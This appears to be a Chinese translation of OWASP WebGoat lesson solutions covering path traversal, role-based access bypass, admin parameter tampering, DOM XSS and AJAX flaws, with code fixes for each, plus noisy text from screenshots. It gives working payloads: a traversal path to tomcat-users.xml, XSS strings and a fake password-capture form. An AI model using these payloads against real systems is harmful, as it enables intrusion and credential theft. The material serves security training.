In a role-based access control scheme, a role represents a set of access permissions and privileges. A user can be assigned one or more roles. A role-based access control scheme normally consists of two parts: role permission management and role assignment. A broken role-based access control scheme might allow a user to perform accesses that are not allowed by his/her assigned roles, or somehow allow privilege escalation to an unauthorized role.

#### General Goal(s):

Each user is a member of a role that is allowed to access only certain resources. Your goal is to explore the access control rules that govern this site. Only the [Admin] group should have access to the 'Account Manager' resource.

#### \* Congratulations. You have successfully completed this lesson. \* User Larry [User, Manager] was allowed to access resource Account Manager

Change user:	Larry 💌
Select resource:	Account Manager 💌
	Check Access

当显示"用户 Larry 对资源 Account Manager 具有访问权限时",本课程完成。



# 2.2.2 绕过基于路径的访问控制方案(Bypass a Path Based Access Control Scheme)

## 2.2.2.1 技术概念或主题(Concept / Topic To Teach)

在一个基于路径的访问控制方案中,攻击者可以通过提供相对路径信息遍历路径。因此, 攻击者可以使用相对路径访问那些通常任何人都不能直接访问或直接请求就会被拒绝的文件。

#### 2.2.2.2 技术原理(How It works)

大多数操作系统允许在路径中使用某些特征字符,如:

/etc/passwd			
~/.ssh			
./configure			
.///etc/passwd			
c:\boot.ini			
.\test.txt			
\\boot.ini			
file:///c:\bbot.ini			
c:\test~1.txt			

## 2.2.2.3 总体目标(General Goals)

用户"user"能够访问 lesson\_plans/English 目录下所有文件。您需要尝试突破访问控制策略,访问不在下列清单中的文件。选中一个文件后,单击【View File】按钮 WebGoat 会给出 该文件能否被访问的提示信息。一个有趣并值得尝试的是访问 Tomcat 的配置文件,一般是 "tomcat/conf/tomcat-users.xml"。注意:该文件的位置取决于您正在使用的 WebGoat 版本和 环境。



## 2.2.2.4 操作方法(Solutions)

选中"Choose the file to view"列表下的任何一个文件,然后点击【View File】,用 WebScarab 工具截获向服务器发送的请求,如图所示:



🚔 Edit Reques	it						<u>×</u>
				Intercept requests	: 🗹 Intercept respo	onses : 📃	
Parsed Ray	N						
Method URL							Version
POST http://lo	ocalhost:	8080/we	bgoat/attacl	k?Screen=175&mer	iu=200		HTTP/1.0
Header					Value		Insert
Accept Referen	imag	e/gif, im: localhac	age/x-xbitma	ap, image/jpeg, imag	je/pjpeg, application/m	isword, application/vnd.ms-excel, tort=175	Delete
	nup.»	nocanios	st.ouoowebi	guaballack for teen-	17 Samenu-200artes	tan–175	
URLEncoded	Text	Hex					
		Varia	able			Value	
File					AccessControlMatrix.h	tml	
SUBMIT					View File		
							Insert Delete
<u> </u>					1		

在上图中 File 的 Value 值就是想要访问的文件名,修改此处,改为

#### tomcat\conf\tomcat-users.xml

注意: 文件的路径。如下图所示:

<u>~</u>	uest								_ 🗆 ×
				Intercept request	s : 🖌 Intercept respo	nses : 📃			
Parsed F	Raw								
Method URL									Version
POST http	://localhost	:8080/we	ebgoat/attack	?Screen=175&me	nu=200				HTTP/1.0
Header	,				Value				Incort
Accept	imag	je/gif, im:	age/x-xbitma	p, image/jpeg, ima	ge/pjpeg, application/m	sword, application/vn	d.ms-excel,		insert
Referer	http:/	Viocalhos	st:8080/webg	goat/attack?Screen	=175&menu=200&Rest	art=175		-	Delete
	ul Tout								
URLENCOUE	iu Text	пех			1				
Filo		Varia	able			Value		_	
SUBMIT					View File	rs.xmij		_	
									Insert
									Delete



完成数据篡改后,单击【Accept changes】即可。在页面出现如下所示,则表示攻击成



## 2.2.2.5 特别说明(Special Explanations)

笔者使用的 OWASP 虚拟机(OWASP Broken Web Apps VM v1.0)中,tomcat 用户配置文件路径为:

/etc/tomcat6/tomcat-users.xml

因此 WebScarab 中填写的相对路径为:

../../../../../../../../../etc/tomcat6/tomcat-users.xml

Windows 环境下路径分割符为:"\"。

## 2.2.3 基于角色的访问控制(LAB: Role Based Access Control)

### 2.2.3.1 技术概念或主题(Concept / Topic To Teach)

在一个基于角色访问控制的方案中,角色代表一组访问权限和特权。一个用户可以被分配一个或多个角色,一个基于角色的访问控制通常包括两个部分:角色权限管理和角色分配。 一个被破坏的基于角色的访问控制方案,可能允许用户以没有分配他/她的角色或以某种方 式获得的未经授权的角色进行访问。

### 2.2.3.2 技术原理(How It works)

很多网站都尝试使用基于角色的方式严格限制资源访问,但开发人员在实现这类解决方 案时容易出现疏忽。



## 2.2.3.3 总体目标(General Goals)

#### 2.2.3.3.1 Stage 1: 绕过表示层访问控制(Bypass Presentational Layer

#### **Access Control**)

Tom 是一名普通员工。请利用系统脆弱的访问控制策略,在员工列表页面执行删除功能,验证 Tom 的个人信息能够被删除。每个用户的密码为该用户姓名中"名"的小写,如: Tom Cat 的密码是 tom)

ſ	Please Login	
	Larry Stooge (employee) 💌	
	Password	
l	)	

# 2.2.3.3.2 Stage 2: 添加业务层的访问控制(Add Business Layer Access Control)

# 本课程需要在 WebGoat 开发版本上完成。

实施安全修复以拒绝未授权用户执行用户信息删除功能。要完成该功能,您需要修改 WebGoat 代码。一旦完成该步骤,请返回 Stage 1,重新测试并验证用户信息验证删除功能 能够被成功阻止。



#### 2.2.3.3.3 Stage 3: 绕过数据层访问控制(Breaking Data Layer Access

#### Control)

Tom 是一名普通员工。请以 Tom 的身份,利用系统脆弱的访问控制策略越权访问另一 名员工的个人信息,并验证访问结果。

### 2.2.3.3.4 Stage 4: 添加数据层访问控制(Add Data Layer Access

#### Control)

#### 本课程需要在 WebGoat 开发版本上完成。

实施安全修复以拒绝未授权用户对数据的访问。要完成该功能。一旦完成该步骤,请返回 Stage 3,重新测试并验证尝试访问其它员工信息的行为能够被阻止。

#### 2.2.3.4 课程资源(Lesson Resources)

### 2.2.3.4.1 组织架构图(Orgnization Chart)





## 2.2.3.4.2 访问控制矩阵(Access Control Matrix)

Assets Roles	Search	List Staff	View Profile	Edit Profile	Create Profile
Employee	x	X (Self Only)	x	X (Portions)	
Manager	x	x	x		
HR	x	x	x	X (Others Only)	x
Admin	x	x	х	x	x

address2 VARCHAR(80)

disciplined\_date CHAR(8)

disciplined\_notes VARCHAR(60

personal\_description VARCHAR(60)

start\_date CHAR(8)

ccn VARCHAR(30)

manager INT

ccn\_limit INT

salary INT

#### 2.2.3.4.3 数据库结构(Database Schema)

Employee

- userid INT NOT NULL PRIMARY KEY
- first\_name VARCHAR(20)
- last\_name VARCHAR(20)
- ssn VARCHAR(12)
- password VARCHAR(10)
- title VARCHAR(20)
- phone VARCHAR(13)
- address1 VARCHAR(80)

#### Roles

- userid INT NOT NULL
- role VARCHAR(10) NOT NULL
- PRIMARY KEY (userid, role)

#### Ownership

- employer\_id INT NOT NULL
- employee\_id INT NOT NULL
- PRIMARY KEY (employee\_id, employer\_id)

## 2.2.3.5 操作方法(Solutions)

#### 2.2.3.5.1 Stage 1: 绕过表示层访问控制(Bypass Presentational Layer

#### Access Control)

首先查找具有【DeleteProfile】权利的角色。通过登录每一个用户的帐号,可以发现作为 HR 的 Jerry 具有【DeleteProfile】的权利,如图所示:



Solution Videos

**Restart this Les** 

**Stage 1** Stage 1: Bypass Presentational Layer Access Control. As regular employee 'Tom', exploit weak access control to use the Delete function from the Staff List page. Verify that Tom's profile can be deleted. The passwords for users are their given names in lowercase (e.g. the password for Tom Cat is "tom").

Goat Hills Financial Human Resources									
Welcome Back Jerry - Staff Listing Page									
Select from the list below Tom Cat (employee) Jerry Mouse (hr) Joanne McDougal (hr)	SearchStaff ViewProfile CreateProfile DeleteProfile Logout								

在 Select from the list below 下方的列表中选中一个用户,然后点击【DeleteProfile】。通 过抓包工具 WebScarab 可以截获向服务器发送的请求,如下图所示:



🚔 Edit Reg	quest										_ 🗆 ×
					Intercept requ	ests :	Intercept responsible	ise	s: 🔲		
Parsed	Raw										
Method UR	ST .										Version
POST http://localhost:8080/webgoat/attack?Screen=43&menu=200 H										HTTP/1.0	
Heade	er						Value				Insert
Accept		image	/gif, ima	age/x-xbitma	ap, image/jpeg,	image/	pjpeg, application/ms	swo	rd, application/vnd.ms-excel, .		Delete
Referer		http://lo	ocalhos	st:8080/web	goat/attack?Scr	reen=43	{&menu=200				Delete
URLEncod	led	Text	Hex								
			Varia	able					Value		
employee_i	id					11	0				
action						D	eleteProfile				
											Insert
											Delete
A.T.											
		A	ccept o	changes	Cancel cha	nges	Abort request		Cancel ALL intercepts		
									No. of Concession, Name of		

由上图可以看出 action 对应的 value 值是 DeleteProfile,即我们在 Tom 账户中任意选择 一种 action,将其对应的 value 值改为 DeleteProfile,则 Tom 就具有了 DeleteProfile 权利。首 先,登录 Tom 账户,最初的 Tom 账户如下图所示:

👬 Welcome Back Tom	- Staff Listing Page	٢
elect from the list below Tom Cat (employee)	SearchStaff ViewProfile Logout	

我们在 Select from the list below 下方的列表中选中 Tom, 然后点击【ViewProfile】, 通过



抓包工具 WebScarab 将 Value 栏的 ViewProfile 改为 DeleteProfile。

🚔 Edit Request								<u> </u>
			Intercept request	s : 🗾 Intercept resp	oonses :			
Parsed Raw								
Method URL								Version
POST http://localhost/8080/webgoat/attack?Screen=43&menu=200 H								
Header				Value				Insert
Accept in	nage/gif, ima	ige/x-xbitma	ap, image/jpeg, ima	ige/pjpeg, application/i	msword	, application/vnd.ms-excel,		Delete
Referer ht	ttp://localhosi	t:8080/webg	goat/attack?Screen	=43&menu=200				Delete
URLEncoded Te	ext Hex							
	Varia	ble				Value		
employee_id				105				
action				ViewProfile				
								Insert
								Delete
								Delete
<b>*</b>	0 ccent c	hange	Cancel change	e Abort romuost		Cancel ALL intercents		
	Muccept L	andinges	cancer crialige	Anorriequest		concerner mercepts		

点击【Accept changes】按钮。出现如下页面,表示攻击成功。



\* You have completed Stage 1: Bypass Business Layer Access Control. \* Welcome to Stage 2: Add Business Layer Access Control

Eles.	Goat Hills Financial Human Resources
👬 Welcom	e Back Tom - Staff Listing Page
Select from the	e list below SearchStaff ViewProfile Logout

# 2.2.3.5.2 Stage 2: 添加业务层的访问控制(Add Business Layer

Access Control)

本课程需要在 WebGoat 开发版本上完成。

要确认用户是否有权执行某操作,首先需要检查该用户的权限。为此,您需要修改 org.owasp.webgoat.lessons.RoleBasedAccesControl.RoleBasedAccessContro 1. java 类中的相关代码。

文件位置:

```
E:\webgoat\WebGoat\tomcat\webapps\WebGoat\JavaSource\org\owasp\webgoat\lesso
ns\RoleBasedAccessControl 下的 RoleBasedAccessControl.java,
```

修改 handleRequest 方法,实现在未授权情况下抛出异常。代码中已经有一个 isAuthorized 方法可供您调用。



if(!isAuthorized(s, getUserId(s), requestedActionName))	
{	
throw new UnauthorizedException();	
}	
/ / * * * * * * * * * * * * * * * * * *	

完成代码修改后,请再次测试并验证 Stage 1 中未越权操作失败。完成该步骤后,本节课程结束。

## 2.2.3.5.3 Stage 3: 绕过数据层访问控制(Breaking Data Layer Access

#### Control)

登录 Tom 用户界面,在 Select from the list below 下选中 Tom 用户,然后点击 ViewProfile, 正常页面如下所示:

First Name:	Tom	Last Name:	Cat
Street:	2211 HyperThread Rd.	City/State:	New York, NY
Phone:	443-599-0762	Start Date:	1011999
SSN:	792-14-6364	Salary:	80000
Credit Card:	5481360857968521	Credit Card Limit:	30000
Comments:	Co-Owner.		
Disciplinary E NA	xplanation:	Disc. Dates:	0
Manager:	106		
ListStaff	EditProfile		Logout

即普通雇员 Tom 只可以查看自己的资料,利用 WebScarab 抓包工具截获请求,得到如下页面:

6	OWASP 中国
U	The Open Web Application Security Project

<b>≜</b> Edit B	equest									
					Intercept reques	ts : 🔽 Intercept resp	onses	: 🗆		
Parsed	Raw	1								
Method U	IRL									Version
POST	POST http://localhost.8080/webgoat/attack?Screen=43&menu=200									HTTP/1.0
Hea	der					Value				Insert
Accept Referer		image http://l	e/gif, im: localhos	age/x-xbitma st:8080/web	ap, image/jpeg, im goat/attack?Scree	age/pjpeg, application/r n=43&menu=200	nswor	d, application/vnd.ms-excel,		Delete
A.T.					-					
URLEnco	oded	Text	Hex							
			Varia	able				Value		
employee	_id					105				
action						viewProme				
										Insert
										Delete
▲. <del></del>										
		-	Accept	changes	Cancel change	es Abort request		Cancel ALL intercepts		
					a					

要想查看别人的资料,可以将 employee\_id 的 value 值改为 101 (用户 Jarry 的 ID),修改之后点击【Accept changes】。出现如下页面,则攻击成功。



#### \* You have completed Stage 3: Bypass Data Layer Access Control. \* Welcome to Stage 4: Add Data Layer Access Control

E Contraction	Goat Hills Human Reso	<b>s Financia</b> urces	d	
Welcom	e Back Tom - View I	Profile Page		O
First Name:	Larry	Last Name:	Stooge	
Street:	9175 Guilford Rd	City/State:	New York, NY	
Phone:	443-689-0192	Start Date:	1012000	
SSN:	386-09-5451	Salary:	55000	
Credit Card:	2578546969853547	Credit Card Limit:	5000	
Comments:	Does not work well	with others		
Disciplinary E	xplanation:	Disc. Dates:	10106	
Constantly ha	arassing coworkers			
Manager:	102			
ListStoff	EditOrofile			Logout
				Logour

### 2.2.3.5.4 Stage 4: 添加数据层访问控制(Add Data Layer Access

Control)

#### 本课程需要在 WebGoat 开发版本上完成。

您必须判断用户的操作权限,以及作为雇员用户的操作权限。为此, 您需要检查用户 授权。该操作需要通过在 org.owasp.webgoat.lessons.RoleBasedAccesControl.RoleBasedAccess Control.java 类中修改代码实现。修改 handleRequest 方法,实现在未授权情况下抛出异常。 代码中已经有一个 isAuthorizedForEmployee 方法可供您调用。



}

throw new UnauthorizedException();

完成代码修改后,请再次测试并验证 Stage 3 中越权操作失败。完成该步骤 后,本节课程结束。

## 2.2.4 远程管理访问(Remote Admin Access)

#### 2.2.4.1 技术概念或主题(Concept / Topic To Teach)

应用程序通常会有一个管理界面,这个界面一般用户无法访问到,只有具有特权的用户 才能访问。

#### 2.2.4.2 技术原理(How It works)

很多网站开发人员在脚本中预留了相关的参数接口,一旦该参数被后台程序确认,则访问者的权限会被放大,浏览到先前不能访问的资源,如:程序调试日志、隐藏功能菜单等。

## 2.2.4.3 总体目标(General Goals)

尝试访问 WebGoat 的管理界面。您也可以尝试访问 Tomcat 的管理界面。Tomcat 的管理 界面可通过 URL(/admin)访问,但不作为本课程完成的考核内容。

#### 2.2.4.4 操作方法(Solutions)

首先访问管理界面 URL 为在当前地址后添加&admin=true, 打开"Admin functions"后,可 以看到有【Report Card】、【User Information】、【Product Information】、【Report Card】和【Adhoc Query】等选项,选中 User Information,则会出现如下页面:


Restart this Lesson

Introduction General Access Control Flaws AJAX Security Authentication Flaws Buffer Overflows Code Quality Concurrency Cross-Site Scripting (XSS) Denial of Service Improper Error Handling Injection Flaws Insecure Communication Insecure Comfiguration Insecure Storage Malicious Execution Parameter Tampering Session Management Flaws Web Services Introduction Web Services Admin Functions Report Card

Challenge

Solution Videos

Screen=53

#### menu=2000

#### JSESSIONID - 566C2549FEA5C11518F5D6BC4B78EE8A

How To Work With WebGoat

Welcome to a short introduction to WebGoat. Here you will learn how to use WebGoat and additional tools for the lessons.

#### Environment Information

WebGoat uses the Apache Tomcat server. It is configured to run on localhost although this can be easily changed. This configuration is for single user, additional users can be added in the tomcat-users.xml file. If you want to use WebGoat in a laboratory or in class you might need to change this setup. Please refer to the Tomcat Configuration in the Introduction section.

#### The WebGoat Interface



这是因为只有管理者才有权限查看 User Information,在当前地址后面添加&admin=true,

#### 可得如下界面:

Report Card

🥙 User Information Product Information Adhoc Query Challenge

Introduction General Access Control Flaws AJAX Security Authentication Flaws Buffer Overflows Code Quality Concurrency Cross-Site Scripting (XSS) Denial of Service Improper Error Handling Injection Flaws Insecure Communication Insecure Configuration Insecure Storage Malicious Execution Parameter Tampering Session Management Flaws Web Services Admin Functions

#### Solution Videos

Restart t

#### Screen=53

admin=true

menu=2000

JSESSIONID 🕏 566C2549FEA5C11518F5D6BC4B78EE8A

#### \* Congratulations. You have successfully completed this lesson.

#### USERID USER\_NAME PASSWORD COOKIE

101	jsnow	passwd1
102	jdoe	passwd2
103	jplane	passwd3
104	jeff	jeff
105	dave	dave

OWASP Foundation | Project WebGoat | Report Bug

即我们可以看到用户的相关信息,而这些信息都是只有 admin 才可以看得,至此攻击 成功,在 Access Control Flaws 中可以看到如下提示成功的页面:

•	administrative interrace for Lomcat. The Lomcat admin interrace can be accessed via a UKL (/admin) and will not count towards the completion of this lesson.
Stage 1: Bypass Business Layer Access Control Stage 2: Add Business Layer Access Control	* Congratulations. You have successfully completed this lesson.
Stage 3: Bypass Data Layer Access Control	
Stage 4: Add Data Layer Access Control	OWASP Foundation   Project WebGoat   Report Bug
Kemote Admin Access	



#### 2.2.4.5 特别说明(Special Explanations)

笔者使用的 OWASP 虚拟机(OWASP Broken Web Apps VM v1.0)中, Tomcat 后台路径不 是手册中描述的地址,而是:

http://IP:8080/manager/html

## 2.3 Ajax 安全(Ajax Security)

## 2.3.1 同源策略保护(Same Origin Policy Protection)

#### 2.3.1.1 技术概念或主题(Concept / Topic To Teach)

AJAX 技术的一项关键元素是 XMLHttpRequest (XHR),该技术允许客户端向服务端发起 异步调用。然而,作为一项安全措施,这些请求最好只能从客户端原始页面向服务端发起访问。

#### 2.3.1.2 技术原理(How It works)

同源策略是客户端脚本(尤其是 Javascript)的重要的安全度量标准。它最早出自于 Netscape Navigator2.0,其目的是防止某个文档或脚本从多个不同源装载。

当脚本被浏览器半信半疑运行在沙箱时,它们应该只被允许访问来自同一站点的资源, 而不是那些来自其它站点可能怀有恶意的资源。

#### 2.3.1.3 总体目标(General Goals)

该练习将演示同源策略保护。XMLHttp 只能向同源服务端发送请求,任何向非同源服务 端发送数据的尝试都将失败。

#### 2.3.1.4 操作方法(Solutions)

依次点击页面中的两个链接,查看浏览器的操作结果完成本节课程。



2 Q+ Web - 時讯官方为恋提供。	tack?Screen=41&menu=400	ection 🛪 <u>Is</u> cartænna	ム息思_翻译_用	¥梓 ▲
Choose another lang	uage: English 💲			Logout 🕜
		Same Orig	in Policy	Protection
OWASP WebGoat v5.	4 ◀ Hints  Show Params S	now Cookies Lesson Pl	an Show Java	Solution
Introduction General Access Control Flaws	Solution Videos		R	estart this Lesson
AJAX Security Authentication Flaws Buffer Overflows Code Quality	This exercise demonstrates the S back to the originating server. Atte	me Origin Policy Protection. mpts to pass data to a non-	XHR requests car originating server	n only be passed r will fail.
Concurrency Cross-Site Scripting (XSS)	Enter a URL:			_
Improper Error Handling Injection Flaws				Go!
Insecure Communication Insecure Configuration	Response:			~
Insecure Storage Malicious Execution Parameter Tampering				
Session Management Flaws Web Services Admin Functions				
Challenge	Click here to try a Same Origin reg lessons/Ajax/sameOrigin.jsp	<u>uest:</u>		_
	Click here to try a Different Origin i	equest: =aspect+security		

# 2.3.2 基于 DOM 的跨站点访问(LAB: DOM-Based cross-site

### scripting)

#### 2.3.2.1 技术概念或主题

文档对象模型(DOM)从安全的角度展现了一个有趣的问题。它允许动态修改网页内容,但是这可以被攻击者用来进行恶意代码注入攻击。XSS,一种恶意代码注入,一般会发生在未经验证的用户的输入直接修改了在客户端的页面内容的情况下。

### 2.3.2.2 技术原理

HTML DOM 实体中可随时插入新的 HTML 语句或 JavaScript 语句,因此很容易被恶意代码利用,从而用来改变页面显示内容或执行恶意代码。

HTML 标记语言中很多标签的特殊属性参数中允许插入 JS 代码,如: IMG/IFRAME 等。

#### 2.3.2.3 总体目标

在这个练习中,您的任务是利用此漏洞将恶意代码注入到 DOM,然后在最后阶段,通



http://www.owasp.org.cn

过修改代码来修复这个缺陷,从而解决该漏洞。

#### 2.3.2.3.1 Stage 1:改变 Web 页面显示内容

在这个练习中,您的任务是构造恶意代码,使用图片 <u>OWASP IMAGE</u> (http://192.168.33.204/WebGoat/images/logos/owasp.jpg) 改变原来 Web 页面的显示方式。

◄ Hints ►	Show Params	Show Cookies	Lesson Plan	Show Java	Solution
Solution Vid	eos			Rest	art this Lesson
STAGE 1: For following loca	this exercise, yo tion: OWASP IM/	our mission is to d AGE	leface this websit	e using the in	nage at the
Enter your na	ame:				
Submit Sol	ution				
			AS	PECT	ECURITY plication Security Experts
OWASP Four	dation   Project \	WebGoat   Report	Bug		

2.3.2.3.2 Stage 2:使用 IMG 标签

现在,请利用 image 标签创建 JavaScript Alert 对话框。

#### 2.3.2.3.3 Stage 3:使用 IFRAME 标签

现在,请利用 iframe 标签创建 JavaScript Alert 对话框。

#### 2.3.2.3.4 Stage 4:伪造输入框

使用如下代码创建虚假输入框,骗取用户密码。



#### 2.3.2.3.5 Stage 5:修复漏洞

启用客户端 HTML 内容编码以规避 DOM XSS 漏洞。escape.js 文件中提供了各种您可以 使用的方法。

#### 2.3.2.4 操作方法

#### 2.3.2.4.1 Stage 1:改变 Web 页面显示内容

输入"<IMG SRC="images/logos/owasp.jpg"/>",然后提交。返回如图所示:

STAGE 1: For this exercise, your mission is to deface this website using the image at the following location:  ${\sf OWASP}\ {\sf IMAGE}$ 





### 2.3.2.4.2 Stage 2:使用 IMG 标签

输入"<img src=x onerror=;;alert('XSS') />", 然后提交。返回结果如图所示:

STAGE 2: Now, try to create a JavaScript alert using the image tag

Hello, !

Enter your name: onerror=;;alert('XSS') />

Submit Solution





## 2.3.2.4.3 Stage 3:使用 IFRAME 标签

输入"<IFRAME SRC="javascript:alert('XSS');"></IFRAME>",然后提交。返回结果如图所示:

STAGE 3: Next, try to create a JavaScript alert using the IFRAME tag.

ello,	1

## 2.3.2.4.4 Stage 4:伪造输入框

输入以下代码:

Please enter your password: <input name="pass" type="password"/> <button< th=""></button<>
onClick="javascript:alert('I have your password: ' +
pass.value);">Submit        

然后提交,返回结果如图所示:

STAGE 4: Use the following to cre	ate a fake login form:
Please enter your password:  onClick="javascript:alert("I have p pass.value);">Submit <i< td=""><th><input name="pass" type="password"/><button rour password: ' + &amp;R&gt;         <b< th=""></b<></button </th></i<>	<input name="pass" type="password"/> <button rour password: ' + &amp;R&gt;         <b< th=""></b<></button 
Hello, Please enter your pa Submi	ssword:

Enter your name:	>      <
Submit Solution	1

页面上部的 INPUT 输入框是伪造的,用户输入的密码信息会被截取。

¥.



#### 2.3.2.4.5 Stage 5:修复漏洞

输入部分需要用到 JavaScript 文件 escape.js。您可以在 tomcat\webapps\WebGoat\javasc

ript (Standart Version) 或 WebContent\javascript (开发版)中找到相关的脚本文件。 编辑 DOMXSS.js,将以下内容:

function displayGreeting(name) {
 if (name != "){
 document.getElementById("greeting").innerHTML="Hello, " + name + "!";
}

修改为:

function displayGreeting(name) {
 if (name != "){
 document.getElementById("greeting").innerHTML="Hello, " + escapeHTML(name); + "!";

}

}

完成修改后,针对该漏洞的利用将被屏蔽。

## 2.3.3 小实验:客户端过滤(LAB: Client Side Filtering)

#### 2.3.3.1 技术概念或主题

服务端只向客户端发送其只能访问到的数据。在本课程中,服务端向客户端发送了过多的数据,由此产生了一个严重的访问控制问题。

#### 2.3.3.2 技术原理

服务端与客户端数据交互过程虽然被页面代码进行了隐藏,但仍然可以通过 Firebug、 IEWatch、WebScarab 等工具捕获到,直接显示在用户眼前。



### 2.3.3.3 总体目标

该课目的在于利用服务器返回的多余信息,发现您不该访问的信息并修复该漏洞。

### 2.3.3.3.1 Stage 1:查找额外敏感信息

找到 Neville Bartholomew 的薪水信息。

#### 2.3.3.3.2 Stage 2:修复漏洞

修复该问题。修改服务器代码,确认只能返回 Moe Stooge 才能访问的返回数据。

### 2.3.3.4 操作方法

#### 2.3.3.4.1 Stage 1:查找额外敏感信息

通过【Select user】下拉菜单查询其它数据。在有返回数据的时候使用 Firebug 或 WebScarab 查看源代码或返回数据。找到 Neville 的薪水信息。





提交概述据后,完成本课程第一步。

#### 2.3.3.4.2 Stage 2:修复漏洞

OWASP 中国 The Open Web Application Security Project

本课程中,您需要修改 clientSideFiltering.jsp 中的代码。该文件您可以在 WebContent 的 lessons/Ajax 文件夹下找到。该安全漏洞的主要问题是服务端将所有数据返回给客户端,尽管这些敏感数据被隐藏了,但仍然可以被发现。在本课程中您可以在 XPath 查询中增加一个过滤器。在文件中您可以找到如下结构:

StringBuffer sb = new StringBuffer(); sb.append("/Employees/Employee/UserID | "); sb.append("/Employees/Employee/FirstName | "); sb.append("/Employees/Employee/SSN | "); sb.append("/Employees/Employee/Salary "); String expression = sb.toString();

该字符串可以在 XPath 查询中被使用。您需要授权只有管理人员才可以查看其它的雇员的信息。要实现该功能您需要使用 XPath 过滤器。以下代码可以实现:

StringBuffer sb = new StringBuffer(); sb.append("/Employees/Employee[Managers/Manager/text() = " + userId + "]/UserID | "); sb.append("/Employees/Employee[Managers/Manager/text() = " + userId + "]/FirstName | ");



sb.append("/Employees/Employee[Managers/Manager/text() = " + userId + "]/LastName | "); sb.append("/Employees/Employee[Managers/Manager/text() = " + userId + "]/SSN | "); sb.append("/Employees/Employee[Managers/Manager/text() = " + userId + "]/Salary "); String expression = sb.toString();

现在,您的客户端将只能访问到经过授权的信息了。

## 2.3.4 DOM 注入(DOM Injection)

#### 2.3.4.1 技术概念或主题

本课程将教会您如何执行 DOM 注入攻击

#### 2.3.4.2 技术原理

一些应用程序专门使用 AJAX 操控和更新在 DOM 中能够直接使用的 JavaScript、DHTML 和 eval()方法。攻击者可能会利用这一点,通过拦截答复,注入一些 JavaScript 命令,实施攻击。

#### 2.3.4.3 总体目标

- \* 目标系统需要您输入激活码;
- \* 您的目标就是激活被禁用的按钮;
- \* 您需要花点时间阅读 HTML 代码,理解激活码的验证过程。

## 2.3.4.4 操作方法

浏览器与服务端通过 Ajax 技术实现 XML 通信。查看 HTML 源代码后,您会发现代码中 使用了 XMLHttpequest。

```
<script>
function validate() {
var keyField = document.getElementById('key');
var url = 'attack Screen=80&menu=1150&from=ajax&key=' +
encodeURIComponent(keyField.value);
if (typeof XMLHttpRequest != 'undefined') {
req = new XMLHttpRequest();
```



```
} else if (window.ActiveXObject) {
req = new ActiveXObject('Microsoft.XMLHTTP');
}
req.open('GET', url, true);
req.onreadystatechange = callback;
req.send(null);
}
function callback() {
    if (req.readyState == 4) {
        if (req.status == 200) {
            var message = req.responseText;
            eval(message);
        }}}
</script>
```

XML 响应内容中包括激活按钮的 JavaScript 语句。这就需要在 HTML 的 DOM 中植入 JavaScript 语句。该操作要用到 WebScarab 的 HTTP 响应拦截功能。

任意输入一个 license key (比如: "a"),设置 WebScarab 启用 HTTP 请求和响应的拦截。

Edit Request				
Inte	ercept requests : 3	Intercept response	es: 🗵	
Parsed Raw				
Nethod URL				Version
0ET http://neo.80/WebGoat/attack?Screen=80&menu=1150&fro	m=ajax <mark>8key=a</mark>			HTTP/1.1
Header			Value	
ccept	*/*			
ccept-Language	nl-	be		-
alerer	nt	p.meo/VebGoat/attack	?show=NextHint&menu=1150	
RCPU Mark Encoding	28	p in dafiste		Inset
ser-Agent	Mo	zilla/4.0 (compatible; M	ISIE 7.0 Windows NT 5.1: NET CLR 1.1.4322: NET CLR	aroen
DSL	ne	0		Delete
row-Connection	Ke	rep-Alive		
pokle	JS	ESSION/D=9167E3A6F	F58BD9C2A4623079A39E8224	
morization	Ba	isic Z3VIc3Q6Z3VIc3Q=		
+				
Hex				
•				
Accept changes 0	Cancel changes	Abort request	Cancel ALL intercepts	

HTTP 请求



Intercent	remests : 2 Intercent responses : 2	
and cop	requests , El aner cela responses , El	
Parsed Raw		
Method URL	Ve	rsion
GET http://neo.90/WebGoat/attack?Screen=80&menu=1150&from=aja	ιδkey≈a HT	TP/1.1
Header	Value	13
scept	77	-
ccept-Language	ni be	
Referer	http://neo/WebGoat/attack?show=NextHint&menu=1150	
M-CPU	)(26	
Accept-Encoding	gzip, deflate	
Darsad Daw		
Fail Seu Faile		-
ТТРЛ.1 200 ОК		1
erver: Apache-Coyote/1.1		
ragma: No-cache		
ache-Control: no-cache		
ache-Control: no-cache voires: Thu: 01.Jan 1970 01:00:00 CET		
Secher Control: no-cache spines: Thu, 01 Jan 1970 01:00:00 CET Jonnand, Turge Levelenis characata SC 388/0-1		
Sache-Control: no-cache spires: Thu, 01 Jan 1970 01:00:00 CET iontent-Type: texthimit,charset=ISO-8859-1 Transfor-Forentine: chunked		
ache-Control: no-cache xpires: Thu, 01 Jan 1970 00:00.00 CET oriont-Type: testhtmi; charset=ISO-8859-1 .Transfer-Encoding: chunked 		
Sache-Control no-cache Sache-Control Jan 1970 00:00:00 CET Jontent-Yupe: texthinki, charsetilG0-8659-1 Transfer-Encoding: chunked Isée: Weg, 11 Jul 2007 14:43:06 GMT		
Jache Control no cache Sprijes Thu, UJ Jan 1970 00 100 00 CET Ionteni-Type texthimi, charset+ISO-8859-1 Transfer-Encoding, chunked Jack Wed, 13 Jul 2007 14 43 06 GMT -RevealHildden, possibly modified		
Sache-Control no-cache Expires Thu, 01 Jan 1970 01 00 00 CET Jontent-Type: texthtml,charsetriISO-8859-1 CTransfer-Encoding, chunked Joate: Wed, 11 Jul 2007 14:43:06 GMT GrevealHiden possibly modified Jontent-length: 23208		
Sache-Control: no-cache Sache-Control: no-cache Jagines: Thu, pJ: Jan 1970 00:00:00 CET Jontent-Type: textshtmis, charsestell60-8859-1 Transfer-Encoding: chunked Jade: Wed, 11 Jul 2007 14:43:06 GMT Reveal-Hidden: possibly modified Jontent-length: 23208		
Sache-Control: no-cache Sache-Control: no-cache Iontent-Type: terdhrimi,charsetri/SO-8859-1 -Transfer-Encoding: chunked Jake: Wed, 13, Jul 2007 14:43:06 GMT -RevealHildden: possibly modified Jontent-length: 23208		
Sache-Control: no-cache Sache-Control: no-cache Zenres-Thu, pi 13.n 1970 00:00:00 CET Content-Yupe: teoShtmic,charsetiiSO-8959-1 Transfer-Encoding: chunked Jate: Wed, 11 Jul 2007 14.43:05 GMT -Reveat-Hidden: possibly modified Content-length: 23208		
Sache-Control: no-cache sache-Control: no-cache sprines: Thu, Di Jan 1970 01:00:00 CET Content-Type: textshmis, charsetti ISO-8859-1 :Transfer-Encoding: chunked sache: Wed, 13 Jul 2007 14:43:06 GMT :Reveal-Hidden: possibly modified :content-length: 23208 IDOCCORE Hall BLIDLING: MARCHIDD SutTH, 1:0 Transmission/IEDC 1980	assessed assetTD-babball 07TD-babball drive offensel dief-	
